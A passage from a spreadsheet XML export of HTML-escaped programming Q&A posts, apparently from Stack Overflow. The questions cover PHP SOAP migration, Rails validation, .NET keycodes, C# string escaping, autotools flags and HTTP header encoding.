&lt;li&gt;I don't know how/if this can be done. (Hence this question)&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Somehow include &lt;code&gt;Usefulthings&lt;/code&gt; and only bring in some of it's methods
&lt;ul&gt;
&lt;li&gt;I also don't know how/if this can be done&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Create a proxy class, include &lt;code&gt;UsefulThings&lt;/code&gt; in that, then delegate &lt;code&gt;format_text&lt;/code&gt; to that proxy instance
&lt;ul&gt;
&lt;li&gt;This would work, but anonymous proxy classes are a hack. Yuck.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Split up the module into 2 or more smaller modules
&lt;ul&gt;
&lt;li&gt;This would also work, and is probably the best solution I can think of, but I'd prefer to avoid it as I'd end up with a proliferation of dozens and dozens of modules - managing this would be burdensome&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Why are there lots of unrelated functions in a single module? It's &lt;code&gt;ApplicationHelper&lt;/code&gt; from a rails app, which our team has de-facto decided on as the dumping ground for anything not specific enough to belong anywhere else. Mostly standalone utility methods that get used everywhere. I could break it up into seperate helpers, but there'd be 30 of them, all with 1 method each... this seems unproductive&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moving from NuSOAP to PHP5 SOAP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been working on a script with PHP4 that relies on NuSOAP. Now, I'm trying to move this to PHP5, and use the buildin support for SOAP there.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$wsdlPath = "";    // I have obviously set these variables to something meaningful, just hidden for the sake of security
$apiPath = "";
$username = "";
$password = "";
// PHP5 style
$client = new soapclient($wsdlPath, array('login'=&amp;gt;username,    			
'password'=&amp;gt; $password,
'soap_version'=&amp;gt; SOAP_1_2,
'location'=&amp;gt; $apiPath,
 'trace'=&amp;gt; 1));
// PHP4/NuSOAP style
$client = new soapclient($wsdlPath, true);  
client-&amp;gt;setEndpoint($apiPath);  						
$client-&amp;gt;setCredentials($username, $password);
$client -&amp;gt;loadWSD);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The PHP5-version throws the following exception stacktrace:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EXCEPTION=SoapFault exception: [WSDL] SOAP-ERROR: Parsing WSDL: Couldn't load from 'http://external-nbb.napi.norwegian.no.stage.osl.basefarm.net/api/napi1300?wsdl' in /home/eisebfog/public_html/database/norwegian.php:31
Stack trace:
#0 /home/eisebfog/public_html/database/norwegian.php(31): SoapClient-&amp;gt;SoapClient('http://external...', Array)
#1 /home/eisebfog/public_html/database/index.php(53): require_once('/home/eisebfog/...')
#2 {main}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, as the NuSOAP version does work, and the pure PHP5 doesn't - it doesn't take a brain surgeon to figure out I'm doing something wrong. I have access to the .htaccess file, and through phpinfo() I have made sure that I'm running NuSOAP properly and running PHP5 when I should, and PHP4/Nusoap when I should.&lt;/p&gt;
&lt;p&gt;Basically, I'm not very good with web services and soap - but if anyone has any ideas, i'd appreciate any input on what I'm doing wrong and how I can move to the native soap in PHP5. Btw, the reson I want this move in the first place is the assumed resource savings in native soap. I'd appreciate any links to benchmarks between these two solutions too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert a Char into a Keycode in .Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to convert a string into a series of Keycodes, so that I can then send them via PostMessage to a control.  I need to simulate actual keyboard input, and I'm wondering if a massive switch statement is the only way to convert a character into the correct keycode, or if there's a simpler method.&lt;/p&gt;
&lt;p&gt;====&lt;/p&gt;
&lt;p&gt;Got my solution - &lt;a href="http://msdn.microsoft.com/en-us/library/ms646329" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/ms646329&lt;/a&gt;(VS.85).aspx&lt;/p&gt;
&lt;p&gt;VkKeyScan will return the correct keycode for any character.&lt;/p&gt;
&lt;p&gt;(And yes, I wouldn't do this in general, but when doing automated testing, and making sure that keyboard presses are responded to correctly, it works reliably enough).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does Flash work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now I'm developing a small canvas oriented 2D graphics engine for a game, and have been looking into several sources for hints to apply to my system's design. But obviously the most battle proven solution out there is flash, so I was wondering how is Flash architectured. I found some sources about Flash's workings, but most are very basic and oriented towards designers and artists, but I'd like to learn more about the guts of the system. My next step is to download Flex's source code and wade through it, but before that I'd like to have a "guide" to make the best of my time in the code base. Any suggestions of good online resources and articles?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; To make it more clear, I'm looking for the inner workings of Flash because my goal here is to make something similar to Flash, but not as powerful of course, that works in a browser without plugins. Alas pure HTML+Javascript.&lt;/p&gt;
&lt;p&gt;Also the reason I'm not using Flash as such is because it doesn't fulfill my requirements (free + no plugin), and because I don't have Flash support on my target platforms, besides I'm reinventing the wheel here for fun and self-education. Oh and I already know how to use Flash :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TortoiseSVN Repo-Browser urls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I remove the urls of repositories that no longer exist in the dropdown in the TortoiseSvn repo-browser?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Teredo Tunneling Pseudo-Interface?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Running ipconfig /all shows a Teredo Tunneling Pseudo-Interface. What is that? Does this have something to do with IPv4 vs IPv6? Should I get rid of it? If so how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In ruby, why does my IRB interactive debugging session always say "No sourcefile available"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just trying to get my irb sessions to actually list the current line of code, and those around it.  Similar to what Perl's -d debugging mode lets you ddo.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System.BadImageFormatException: Could not load file or assembly (from installutil.exe)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to install a Windows service using InstallUtil.exe and am getting the error message&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.BadImageFormatException: Could not load file or assembly '&lt;code&gt;{xxx.exe}&lt;/code&gt;' or one of its dependencies. An attempt was made to load a program with an incorrect format.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What gives?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;EDIT: (Not by OP) Full message extracted from dup getting way more hits [for googleability]:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;C:\Windows\Microsoft.NET\Framework64\v4.0.30319&gt;InstallUtil.exe C:\xxx.exe
      Microsoft (R) .NET Framework Installation utility Version 4.0.30319.1
      Copyright (c) Microsoft Corporation.  All rights reserved.&lt;/p&gt;
  &lt;p&gt;Exception occurred while initializing the installation:
      System.BadImageFormatException: Could not load file or assembly 'file:///C:\xxx.exe' or one of its dependencies. An attempt was made to load a program with an incorrect format..&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Is an HTTPS query string secure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a secure web based API that uses HTTPS; however, if I allow the users to configure it (include sending password) using a query string will this also be secure or should I force it to be done via a POST?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reading byte stream returned from JavaEE server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a JavaEE server and servlets providing data to mobile clients (first JavaME, now soon iPhone). The servlet writes out data using the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DataOutputStream dos = new DataOutputStream(out);
dos.writeInt(someInt);
dos.writeUTF(someString);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... and so on&lt;/p&gt;
&lt;p&gt;This data is returned to the client as bytes in the HTTP response body, to reduce the number of bytes transferred.&lt;/p&gt;
&lt;p&gt;In the iPhone app, the response payload is loaded into NSData object. Now, after spending hours and hours trying to figure out how to read the data out in the Objective-C application, I'm almost ready to give up, as I haven't found any good way to read the data into NSInteger and NSString (as corresponding to above protocol)&lt;/p&gt;
&lt;p&gt;Would anyone have any pointers how to read stuff out from a binary protocol written by a java app? Any help is greatly appreciated!&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Processes and threads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;1a)Are MS Word and MS PowerPoint different processes or threads of a single process?&lt;/p&gt;
&lt;p&gt;b)How does a spell checker routine (common to both, word and PowerPoint) used? I mean is the code copied 2 times for each of the processes in the main memory,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;if they are different processes&lt;/li&gt;
&lt;li&gt;if they are threads.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The question is not specific to Windows OS.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I remove default banner of web server from response - Apache http1.1 coyote</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please let me know how can I remove default banner of web server from response - Apache http1.1 coyote&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC architecture question for Mac application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a controller class from which I call a method of model class. Now from this model class method I want to update textView object which is a data member of controller class continuously. I have method in the controller class to edit this textView. I tried creating a controller object from the model class method and edited the textView. Although I don't get any errors, but its not displaying the text in the textView. How do I get the model class use controller class method to display text continuously..?? Is it that I am creating a local controller object and referring to its textView instead of the original controller object.&lt;/p&gt;
&lt;p&gt;Controller.m file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (void) notifyContentHasChanged:(NSInteger) block {
    NSString *str;
    str = [NSString stringWithFormat:@"Block Written Successfully: %d\n", block];
    [data insertText:str];
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Model.m file: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Controller * c = [[Controller alloc] init];
while (USB_SUCCESS(status)){
    DfuBlockCnt++;
    printf("\nBlocks Written Successfully: %d",DfuBlockCnt);
    [c notifyContentHasChanged:DfuBlockCnt];
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I get the current state of a thread (e.g. blocking, suspended, running, etc..) in win32?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I couldn't find a documented API that yields this information.&lt;/p&gt;
&lt;p&gt;A friend suggested I use NtQuerySystemInformation. After looking it up, the information is there (see &lt;a href="http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/System%20Information/Structures/SYSTEM_THREAD.html" rel="nofollow"&gt;SYSTEM_THREAD&lt;/a&gt; ) but it is undocumented, and not very elegant - I get the information for all threads in the system.&lt;/p&gt;
&lt;p&gt;Do you know of a more elegant, preferably documented API to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any have a Visual Studio shortcut/macro for toggling break on handled/unhandled exceptions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to write a macro do do the equivalent of &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Hitting Ctrl+Alt+E to bring up the Exceptions window&lt;/li&gt;
&lt;li&gt;Toggling the textbox in the 'thrown' column for 'Common Language Runtime Exceptions'&lt;/li&gt;
&lt;li&gt;Hitting OK&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If I record this, it records only a single line of macro code which doesn't do anything. Anyone know how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lucene.Net and Geosearch - is it outthere somewhere?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've found an interesting article about Lucene and geosearching:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://sujitpal.blogspot.com/2008/02/spatial-search-with-lucene.html" rel="nofollow"&gt;http://sujitpal.blogspot.com/2008/02/spatial-search-with-lucene.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Is there an equivilant .NET implementation out there that I have been unable to find or do I have to rework the Java-code in his example to fit in the .NET Framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does every build change the exe-file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Building the same project (without any changes) produces &lt;strong&gt;binary different&lt;/strong&gt; exe-files: some small regions of them are different. Empty project, version information (and auto-increment on every build) is turned off.&lt;/p&gt;
&lt;p&gt;Why it happens? And is it possible to make delphi produce binary equal files for the same projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IIS7 shows welcome screen in Firefox, Internet Explorer works correctly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone encountered the following problem: I have IIS7 running on my computer. On that same computer, I open IE7 and the website works (&lt;a href="http://localhost/web.site/Default.aspx" rel="nofollow"&gt;http://localhost/web.site/Default.aspx&lt;/a&gt;). Put that same url in Firefox 3 and I get the welcome screen of IIS7, a big image with IIS7 in the middle and 'Welcome' in several different languages. Clicking on the image leads you to &lt;a href="http://www.iis.net/" rel="nofollow"&gt;http://www.iis.net/&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Signaling validation errors in assigning a virtual attribute?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a Rails/ActiveRecord question.&lt;/p&gt;
&lt;p&gt;I have a model which basically has to represent &lt;em&gt;events&lt;/em&gt; or performances. Each event has many &lt;em&gt;attributions&lt;/em&gt;: an attribution is basically something like "In this event, Person X had Role Y".&lt;/p&gt;
&lt;p&gt;I concluded that the best way to allow a user to edit this data is by providing a free text field which expects a structured format, which I'll call a &lt;em&gt;role string&lt;/em&gt;:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;singer: Elvis Costello, songwriter: Paul McCartney, ...&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;where I use autocompletion to complete on both the names of roles (singer, songwriter...) and the names of people. Both roles and people are stored in the database.&lt;/p&gt;
&lt;p&gt;To implement this, I created a virtual attribute in the Event model:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def role_string
    # assemble a role string from the associations in the model
end
def role_string=(s)
    # parse a string in the above role string format,
    # look up the People and Events mentioned, and update
    # what's in the database
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is all fine. The whole thing works quite well, when the role string is well-formed and the associations given by the role string all check out.&lt;/p&gt;
&lt;p&gt;But what if the role string is malformed? Okay, I figure, I can just use a regex together with standard validation to check the format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;validates_format_of :role_string, :with =&amp;gt; /(\w+:\s*\w+)(,\s*\w+:\s*\w+)*/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But what if the associations implied by the role string are invalid? For example, what happens if I give the above role string, and &lt;code&gt;Elvis Costello&lt;/code&gt; doesn't reference a valid person?&lt;/p&gt;
&lt;p&gt;I thought, well, I could use &lt;code&gt;validates_each&lt;/code&gt; on the attribute &lt;code&gt;:role_string&lt;/code&gt; to look up the associations and throw an error if one of the names given doesn't match anything, for example.&lt;/p&gt;
&lt;p&gt;My questions are two: first, I don't like this approach, since to validate the associations I would have to parse the string and look them up, which duplicates what I'd be doing in &lt;code&gt;role_string=&lt;/code&gt; itself, except for actually saving the associations to the database.&lt;/p&gt;
&lt;p&gt;Second, ... how would I indicate that an error's occurred in assigning to this virtual attribute?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I convert a C# string value to an escaped string literal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C#, can I convert a string value to a string literal, the way I would see it in code? I would like to replace tabs, newlines, etc. with their escape sequences.&lt;/p&gt;
&lt;p&gt;If this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Console.WriteLine(someString);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;produces:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Hello
World!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Console.WriteLine(ToLiteral(someString));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to produce:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\tHello\r\n\tWorld!\r\n
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>variable not being passed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while($row = mysql_fetch_row($result))
{
echo '&amp;lt;tr&amp;gt;';
$pk = $row[0]['ARTICLE_NO'];
foreach($row as $key =&amp;gt; $value)
{
echo '&amp;lt;td&amp;gt;&amp;lt;a href="#" onclick="GetAuctionData(\''.$pk.'\')"&amp;gt;' . $value . '&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;';
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which gets pk. pk is then passed on to the axjax part with this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function GetAuctionData(pk)
{
.....
var url="get_auction.php?"
url=url+"cmd=GetAuctionData&amp;amp;pk="+pk;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And finally used in a separate php file with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$pk = $_GET["pk"];
$sql="SELECT * FROM Auctions WHERE ARTICLE_NO ='$pk'";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the second php file works fine when using it by itself and passing parameters. Likewise there are no errors anywhere. The problem seems to be with passing or generating $pk, as the links in the output file result in $pk being incremednted by 2, eg 4, 6, 8 etc&lt;/p&gt;
&lt;p&gt;I can not understand why this is happening.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate and Oracle native functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an entity that maps to an external oracle table which is one of the primary data sources of my application. This entity is modelled using hibernate.&lt;/p&gt;
&lt;p&gt;The oracle table now has a complex function defined the calculates some special values. I need to call this function somehow - almost as another accessor on the entity.&lt;/p&gt;
&lt;p&gt;What would you suggest is the best way to incorporate this function call so that I can maintain relatively normal hibernate access to the entities?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.Net: Users are logged out when deploying a new file to the server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Everytime I upload a file to my ASP.NET site, all users are logged out (aka, I guess their session become invalidated). &lt;/p&gt;
&lt;p&gt;Is there any way to "hotswap" the code in ASP.NET so that this doesn't happen? Compile before deploying etc. &lt;/p&gt;
&lt;p&gt;My deployment method is pretty simple through a SVN update. &lt;/p&gt;
&lt;p&gt;Thanks!
/Niels&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to access previous/next element while for looping?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to access a list(or tuple, or other iterable)'s next, or previous element while looping through with for loop?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;l=[1,2,3]
for item in l:
    if item==2:
        get_previous(l,item)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Autotools : how to set global compilation flag</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project with several sources directories : &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;src/A
   /B
   /C
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In each, the Makefile.am contains &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AM_CXXFLAGS = -fPIC -Wall -Wextra
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can avoid repeating this in each source folder ? &lt;/p&gt;
&lt;p&gt;I tried to modifiy src/Makefile.am and the configure.in, but without success. I thought I could use AC_PROG_CXX to set the compilation flags globally but can't find much documentation on how to use those macro (do you have any pointer to such a documentation ?).&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to block a superclass method to be called to a subclass</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm extending the functionality of a class with a subclass, and I'm doing some dirty stuff that make superclass methods dangerous (app will hang in a loop) in the context of the subclass. I know it's not a genius idea, but I'm going for the low-hanging fruit, right now it's gonna save me some time. Oh it's a dirty job, but someone's gotta do it. &lt;/p&gt;
&lt;p&gt;Bottom line, I need to either block that method from outside, or throw an exception when it's called directly to the superclass. (But I still use it from the subclass, except with care).&lt;/p&gt;
&lt;p&gt;What would be the best way to do this?&lt;/p&gt;
&lt;p&gt;UPDATE ---&lt;/p&gt;
&lt;p&gt;So this is what I went for. I'm not self-answering, as Boaz' answer mentions multiple valid ways to do this, this is just the way that suited me. In the subclass, I overrode the method like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (int)dangerousMethod
{
  [NSException raise:@"Danger!" format:@"Do not call send this method directly to this subclass"];
  return nil;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm marking this as answered, but evidently that doesn't mean it's closed, further suggestions are welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass server-side error messages to ASP.NET Ajax client?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;An example scenario:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;User performs an update, for example a drag &amp;amp; drop. This is an ajax request.&lt;/li&gt;
&lt;li&gt;Server-side code cannot validate the update or the operation just fails. An exception is thrown.&lt;/li&gt;
&lt;li&gt;A reasonable error message should be shown to the user.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;How should I communicate the exception to the client side and show the error message in a div message box?&lt;/p&gt;
&lt;p&gt;The message should be shown &lt;strong&gt;after the fact&lt;/strong&gt;. Sometimes it is possible to prevent errors in client-side code but I'm not concerned about this.&lt;/p&gt;
&lt;p&gt;With traditional data binding in the code behind file I can show a label after an error condition. But if the Ajax control is connected to a provider class specified in the aspx, I don't see how this would be possible. Only option I can think of is to catch server-side exceptions in client-side code. Is this possible? &lt;/p&gt;
&lt;p&gt;I'm using Telerik RadControls for ASP.NET Ajax.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is UML a good notation for messaging systems?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ever since the publication of &lt;a href="http://rads.stackoverflow.com/amzn/click/0321200683" rel="nofollow"&gt;Enterprise Integration Patterns&lt;/a&gt; people have been using the notation introduced in that book for documenting asynchronous heterogenous messaging systems.&lt;/p&gt;
&lt;p&gt;But our shop is more or less standardized around a proprietary documentation tool that does exclusively UML. Is one of the standard UML diagrams appropriate for documenting asynchronous messaging systems, including transformers, routers et al.? If yes, which one? If not, what would be a killer argument against the tweaking of UML for this purpose?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What advice can you give me for writing a meaningful benchmark?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed a framework that is used by several teams in our organisation. Those "modules", developed on top of this framework, can behave quite differently but they are all pretty resources consuming even though some are more than others. They all receive data in input, analyse and/or transform it, and send it further. &lt;/p&gt;
&lt;p&gt;We planned to buy new hardware and my boss asked me to define and implement a benchmark based on the modules in order to compare the different offers we have got. &lt;/p&gt;
&lt;p&gt;My idea is to simply start sequentially each module with a well chosen bunch of data as input. &lt;/p&gt;
&lt;p&gt;Do you have any advice? Any remarks on this simple procedure? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to run my program on before logout on windows XP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for an inverse version of "RunOnceEx".&lt;/p&gt;
&lt;p&gt;RunOnceEx does run some program, before the user's shell(desktop&amp;amp;taskbar) start. The login progress will not continue before the runonceex complete.&lt;/p&gt;
&lt;p&gt;I want to do exact the same but on user logout.
When she/he logout, all running program shutdown, leaving shell(desktop&amp;amp;taskbar), then ""I wish my program will be execute this moment"", finally logout.&lt;/p&gt;
&lt;p&gt;I think it is possible because the "mobsync.exe" is doing that. But I cannot find where and how to do it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WebPartManager &amp; Mobile Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can WebPartManager be used with web parts constructed from mobile web controls?  If possible, should it be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I redirect URLS that begin with /test/ to a separate script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an existing htaccess that works fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteEngine On
RewriteCond %{SCRIPT_FILENAME} !-f
RewriteCond %{SCRIPT_FILENAME} !-d
RewriteRule (.*) /default.php 
DirectoryIndex index.php /default.php
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I wish to modify this so that all urls that start with /test/ go to /test/default.php.&lt;/p&gt;
&lt;p&gt;Example: &lt;a href="http://www.x.com/hello.php" rel="nofollow"&gt;http://www.x.com/hello.php&lt;/a&gt; -- &gt; &lt;a href="http://www.x.com/default.php" rel="nofollow"&gt;http://www.x.com/default.php&lt;/a&gt;
Example: &lt;a href="http://www.x.com/test/hello.php" rel="nofollow"&gt;http://www.x.com/test/hello.php&lt;/a&gt; -- &gt; &lt;a href="http://www.x.com/test/default.php" rel="nofollow"&gt;http://www.x.com/test/default.php&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTTP headers encoding/decoding in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A custom HTTP header is being passed to a Servlet application for authentication purposes. The header value must be able to contain accents and other non-ASCII characters, so must be in a certain encoding (ideally UTF-8).&lt;/p&gt;
&lt;p&gt;I am provided with this piece of Java code by the developers who control the authentication environment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String firstName = request.getHeader("my-custom-header"); 
String decodedFirstName = new String(firstName.getBytes(),"UTF-8");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this code doesn't look right to me: it presupposes the encoding of the header value, when it seemed to me that there was a proper way of specifying an encoding for header values (from MIME I believe).&lt;/p&gt;
&lt;p&gt;Here is my question: what is the right way (tm) of dealing with custom header values that need to support a UTF-8 encoding:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;on the wire (how the header looks like over the wire)&lt;/li&gt;
&lt;li&gt;from the decoding point of view (how to decode it using the Java Servlet API, and can we assume that request.getHeader() already properly does the decoding)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here is an environment independent code sample to treat headers as UTF-8 in case you can't change your service:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String valueAsISO = request.getHeader("my-custom-header"); 
String valueAsUTF8 = new String(firstName.getBytes("ISO8859-1"),"UTF-8");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Safe stream update of file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We perform updates of large text files by writing new records to a temp file, then replacing the old file with the temp file. A heavily abbreviated version:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var tpath = Path.GetTempFileName();
try
{
    using (var sf = new StreamReader(sourcepath))
    using (var tf = new StreamWriter(tpath))
    {
        string line;
        while ((line = sf.ReadLine()) != null)
            tf.WriteLine(UpdateLine(line));
    }
    File.Delete(sourcepath);
    File.Move(tpath, sourcepath);
}
catch
{
    File.Delete(tpath);
    throw;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If anything throws an exception (file not found, no permission), the original file is left untouched, which is what we want.&lt;/p&gt;
&lt;p&gt;However, the code has the following problems:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Is there a real-world situation where the &lt;code&gt;Delete&lt;/code&gt; works but the &lt;code&gt;Move&lt;/code&gt; fails? This would delete the original and updated data. This would be bad.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The most common failure is the source file being open from another application, and the &lt;code&gt;Delete&lt;/code&gt; fails. This means all the Update work is discarded. Is there a way to see if the source file is deletable at the start, and abandon the update if not?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We have users putting Windows Explorer Summary properties, like Title or Comments, on files. These are discarded when we delete the file. Is there a way to copy the old file's Summary properties to a  new file? Should we do this?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How can I customize the text color of the back button in a UINavigationController header view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a custom tintColor on my UINavigationController's navigation bar, and because the color is so light I need to use dark colored text. It's relatively easy to swap out the title view, and the custom buttons I've added on the right hand side, but I can't seem to get a custom view to stick on the back button. This is what I'm trying right now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	UILabel *backLabel = [[UILabel alloc] initWithFrame:CGRectZero];
	[backLabel setFont:[UIFont fontWithName:[[UIFont fontNamesForFamilyName:@"Arial Rounded MT Bold"] objectAtIndex:0] size:24.0]];
	[backLabel setTextColor:[UIColor blackColor]];
	[backLabel setShadowColor:[UIColor clearColor]];
	[backLabel setText:[aCategory displayName]];
	[backLabel sizeToFit];
	[backLabel setBackgroundColor:[UIColor clearColor]];
	UIBarButtonItem *temporaryBarButtonItem=[[UIBarButtonItem alloc] initWithCustomView:backLabel];
	temporaryBarButtonItem.customView = backLabel;
	[backLabel release];
	self.navigationItem.backBarButtonItem = temporaryBarButtonItem;
	[temporaryBarButtonItem release];]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The custom view doesn't stick though, and I don't see any obviously easy way to get at the actual text inside the default button and start changing its style. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I determine if an email is Base64 encoded?</t>
  </si>
  <si>
